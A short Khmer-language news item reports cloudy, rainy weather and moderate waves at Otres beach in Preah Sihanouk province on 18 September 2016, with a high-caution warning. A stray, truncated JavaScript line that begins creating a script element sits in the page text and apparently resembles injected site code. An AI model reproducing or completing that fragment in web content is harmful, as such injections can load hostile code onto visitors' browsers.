លោកឧត្តមសេនីយ៍ ជួណ ណារិន្ទ ៖ ឆ្នេរអូរឈើទាលខ្យល់បក់កន្រ្តាក់ និងទឹករលកមធ្យមអាកាសធាតុបែបនេះ ស្ថិតក្នុងការប្រុងប្រយត័្នខ្ពស់!

ខេត្តព្រះសីហនុ៖ ព្រឹកថ្ងៃទី១៨ ខែកញ្ញា ឆ្នាំ២០១៦ នេះអាកាសធាតុលើផ្ទៃសមុទ្រ ផ្ទៃមេឃបន្តអាប់អួរខ្លាំងមានភ្លៀងធ្លាក់ដោយកន្លែង។ ខ្យល់បក់ខាងលើបង្គួរ និងទឹករលកយោលមួយៗ នៅចន្លោះឃ្លងមធ្យម ។
ឆ្នេរអូរឈើទាលខ្យល់បក់កន្រ្តាក់ និងទឹករលកមធ្យមអាកាសធាតុបែបនេះ ស្ថិតក្នុងការប្រុងប្រយត័្នខ្ពស់។

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More